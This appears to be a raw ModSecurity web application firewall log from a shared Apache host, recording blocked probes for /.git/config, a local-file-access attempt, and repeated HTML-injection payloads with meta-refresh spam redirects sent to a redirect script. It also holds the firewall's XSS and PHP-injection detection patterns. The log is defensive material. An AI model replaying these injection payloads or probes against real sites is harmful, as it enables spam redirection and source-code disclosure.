[unique_id "agIV9VNddpkriGUb6ZVfFAAAAQU"]
[Mon May 11 19:46:29.435607 2026] [security2:error] [pid 1501831:tid 1501838] [client 216.73.216.110:35302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agIV9VNddpkriGUb6ZVfFAAAAQU"]
[Mon May 11 19:46:29.529172 2026] [security2:error] [pid 1501831:tid 1501838] [client 216.73.216.110:35302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIV9VNddpkriGUb6ZVfFAAAAQU"]
[Mon May 11 19:46:50.094766 2026] [authz_core:error] [pid 1502013:tid 1502036] [client 216.73.216.110:46905] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/auth/cas/lib/CAS/PGTStorage/error_log
[Mon May 11 19:46:57.878507 2026] [security2:error] [pid 1502013:tid 1502034] [client 34.226.89.140:4960] ModSecurity: Warning. Pattern match "(?:<\\\\?(?!xml\\\\s)|<\\\\?php|\\\\[(?:/|\\\\\\\\)?php\\\\])" at ARGS:php echo BASEFRONT ?>video/questionnaire.php?formation. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-933-APPLICATION-ATTACK-PHP.conf"] [line "41"] [id "933100"] [msg "PHP Injection Attack: PHP Open Tag Found"] [data "Matched Data: <? found within ARGS:php echo BASEFRONT ?>video/questionnaire.php?formation: <?php echo $formationid ?>"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-php"] [tag "platform-multi"] [tag "attack-injection-php"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "OWASP_TOP_10/A1"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agIWEZYn-x0CHsbEbP2VMAAAAIU"]
[Mon May 11 19:46:57.879054 2026] [security2:error] [pid 1502013:tid 1502034] [client 34.226.89.140:4960] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/js/lightbox/<"] [unique_id "agIWEZYn-x0CHsbEbP2VMAAAAIU"]
[Mon May 11 19:46:57.990883 2026] [security2:error] [pid 1502013:tid 1502034] [client 34.226.89.140:4960] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=5,HTTP=0,SESS=0): PHP Injection Attack: PHP Open Tag Found"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agIWEZYn-x0CHsbEbP2VMAAAAIU"]
[Mon May 11 19:47:58.096289 2026] [security2:error] [pid 1501831:tid 1501842] [client 34.116.236.165:58428] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.git/config"] [unique_id "agIWTlNddpkriGUb6ZVfiwAAAQk"]
[Mon May 11 19:47:58.096529 2026] [security2:error] [pid 1501831:tid 1501842] [client 34.116.236.165:58428] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.git/config"] [unique_id "agIWTlNddpkriGUb6ZVfiwAAAQk"]
[Mon May 11 19:48:01.190415 2026] [security2:error] [pid 1501883:tid 1501888] [client 34.116.236.165:53394] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "letamsgarage.fr"] [uri "/.git/config"] [unique_id "agIWUTP5Q_-MBliRCAxQTQAAAAM"]
[Mon May 11 19:48:01.190682 2026] [security2:error] [pid 1501883:tid 1501888] [client 34.116.236.165:53394] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "letamsgarage.fr"] [uri "/.git/config"] [unique_id "agIWUTP5Q_-MBliRCAxQTQAAAAM"]
[Mon May 11 19:48:01.738308 2026] [security2:error] [pid 1501831:tid 1501842] [client 34.116.236.165:58428] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agIWTlNddpkriGUb6ZVfiwAAAQk"]
[Mon May 11 19:48:03.039879 2026] [security2:error] [pid 1501883:tid 1501888] [client 34.116.236.165:53394] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "letamsgarage.fr"] [uri "/index.php"] [unique_id "agIWUTP5Q_-MBliRCAxQTQAAAAM"]
[Mon May 11 19:48:16.624022 2026] [security2:error] [pid 1511173:tid 1511184] [client 43.134.51.171:56794] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agIWYPjVc-A-CSptvm1cLAAAAEg"]
[Mon May 11 19:48:26.752540 2026] [security2:error] [pid 1501883:tid 1501902] [client 43.128.156.124:45376] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/"] [unique_id "agIWajP5Q_-MBliRCAxQdAAAABE"]
[Mon May 11 19:48:39.037345 2026] [security2:error] [pid 1502013:tid 1502046] [client 34.65.58.9:40714] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "moncampingcarenligne.com"] [uri "/.git/config"] [unique_id "agIWd5Yn-x0CHsbEbP2V1QAAAJQ"]
[Mon May 11 19:48:39.037582 2026] [security2:error] [pid 1502013:tid 1502046] [client 34.65.58.9:40714] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "moncampingcarenligne.com"] [uri "/.git/config"] [unique_id "agIWd5Yn-x0CHsbEbP2V1QAAAJQ"]
[Mon May 11 19:48:39.037823 2026] [security2:error] [pid 1502013:tid 1502046] [client 34.65.58.9:40714] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "moncampingcarenligne.com"] [uri "/.git/config"] [unique_id "agIWd5Yn-x0CHsbEbP2V1QAAAJQ"]
[Mon May 11 19:48:48.956671 2026] [security2:error] [pid 1501831:tid 1501835] [client 27.78.84.116:55023] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWgFNddpkriGUb6ZVfwAAAAQI"]
[Mon May 11 19:48:48.961903 2026] [security2:error] [pid 1501831:tid 1501835] [client 27.78.84.116:55023] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-a..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWgFNddpkriGUb6ZVfwAAAAQI"]
[Mon May 11 19:48:48.965879 2026] [security2:error] [pid 1501831:tid 1501835] [client 27.78.84.116:55023] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/X [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWgFNddpkriGUb6ZVfwAAAAQI"]
[Mon May 11 19:48:48.970586 2026] [security2:error] [pid 1501831:tid 1501835] [client 27.78.84.116:55023] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WE [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWgFNddpkriGUb6ZVfwAAAAQI"]
[Mon May 11 19:48:48.981502 2026] [security2:error] [pid 1501831:tid 1501835] [client 27.78.84.116:55023] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWgFNddpkriGUb6ZVfwAAAAQI"]
[Mon May 11 19:48:48.981976 2026] [security2:error] [pid 1501831:tid 1501835] [client 27.78.84.116:55023] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWgFNddpkriGUb6ZVfwAAAAQI"]
[Mon May 11 19:48:48.982668 2026] [security2:error] [pid 1501831:tid 1501835] [client 27.78.84.116:55023] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 25 - SQLI=0,XSS=20,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=5,SESS=0): IE XSS Filters - Attack Detected."] [tag "event-correlation"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWgFNddpkriGUb6ZVfwAAAAQI"]
[Mon May 11 19:48:51.792487 2026] [security2:error] [pid 1511173:tid 1511192] [client 27.78.84.116:55315] ModSecurity: Warning. Pattern match "(?:\\\\bhttp\\\\/(?:0\\\\.9|1\\\\.[01])|<(?:html|meta)\\\\b)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-921-PROTOCOL-ATTACK.conf"] [line "65"] [id "921130"] [rev "2"] [msg "HTTP Response Splitting Attack"] [data "Matched Data: <meta found within ARGS:url: http://www.www.www.kepenktrsfcdhf.hfhjf.hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWg_jVc-A-CSptvm1cVAAAAFA"]
[Mon May 11 19:48:51.803070 2026] [security2:error] [pid 1511173:tid 1511192] [client 27.78.84.116:55315] ModSecurity: Warning. detected XSS using libinjection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "37"] [id "941100"] [rev "2"] [msg "XSS Attack Detected via libinjection"] [data "Matched Data: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-a..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3"] [tag  [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWg_jVc-A-CSptvm1cVAAAAFA"]
[Mon May 11 19:48:51.803778 2026] [security2:error] [pid 1511173:tid 1511192] [client 27.78.84.116:55315] ModSecurity: Warning. Pattern match "(?i)(?:<(?:(?:apple|objec)t|isindex|embed|style|form|meta)\\\\b[^>]*?>[\\\\s\\\\S]*?|(?:=|U\\\\s*?R\\\\s*?L\\\\s*?\\\\()\\\\s*?[^>]*?\\\\s*?S\\\\s*?C\\\\s*?R\\\\s*?I\\\\s*?P\\\\s*?T\\\\s*?:)" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "65"] [id "941140"] [rev "3"] [msg "XSS Filter - Category 4: Javascript URI Vector"] [data "Matched Data: <meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ /> found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/X [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWg_jVc-A-CSptvm1cVAAAAFA"]
[Mon May 11 19:48:51.804081 2026] [security2:error] [pid 1511173:tid 1511192] [client 27.78.84.116:55315] ModSecurity: Warning. Pattern match "(?i)<[^\\\\w<>]*(?:[^<>\\"'\\\\s]*:)?[^\\\\w<>]*(?:\\\\W*?s\\\\W*?c\\\\W*?r\\\\W*?i\\\\W*?p\\\\W*?t|\\\\W*?f\\\\W*?o\\\\W*?r\\\\W*?m|\\\\W*?s\\\\W*?t\\\\W*?y\\\\W*?l\\\\W*?e|\\\\W*?s\\\\W*?v\\\\W*?g|\\\\W*?m\\\\W*?a\\\\W*?r\\\\W*?q\\\\W*?u\\\\W*?e\\\\W*?e|(?:\\\\W*?l\\\\W*?i\\\\W*?n\\\\W*?k|\\\\W*?o\\\\W*?b\\\\W*?j\\\\W*?e\\ ..." at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "74"] [id "941160"] [rev "2"] [msg "NoScript XSS InjectionChecker: HTML Injection"] [data "Matched Data: <meta  found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WE [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWg_jVc-A-CSptvm1cVAAAAFA"]
[Mon May 11 19:48:51.804308 2026] [security2:error] [pid 1511173:tid 1511192] [client 27.78.84.116:55315] ModSecurity: Warning. Pattern match "(?i:<META[\\\\s/+].*?http-equiv[\\\\s/+]*=[\\\\s/+]*[\\"\\\\'`]?(((c|(&#x?0*((67)|(43)|(99)|(63));?)))|((r|(&#x?0*((82)|(52)|(114)|(72));?)))|((s|(&#x?0*((83)|(53)|(115)|(73));?)))))" at ARGS:url. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "113"] [id "941250"] [rev "3"] [msg "IE XSS Filters - Attack Detected."] [data "Matched Data: <meta http-equiv=r found within ARGS:url: http://www.www.Www.KepenkTrsfcdhf.Hfhjf.Hdasgsdfhdshshfsh@forum.annecy-outdoor.com/suivi_forum/?a[]=<a href=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/>Beautiful middle-aged evening dress models</a><meta http-equiv=refresh content=0;url=https://shopviets.com/mua-dam-da-hoi-dep-cao-cap/ />"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "8"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS/WEB_ATTACK/XSS"] [tag "WASCTC/WASC-8"] [tag "WASCTC/WASC-22"] [tag "OWASP_TOP_10/A3" [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWg_jVc-A-CSptvm1cVAAAAFA"]
[Mon May 11 19:48:51.804816 2026] [security2:error] [pid 1511173:tid 1511192] [client 27.78.84.116:55315] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 25)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agIWg_jVc-A-CSptvm1cVAAAAFA"]
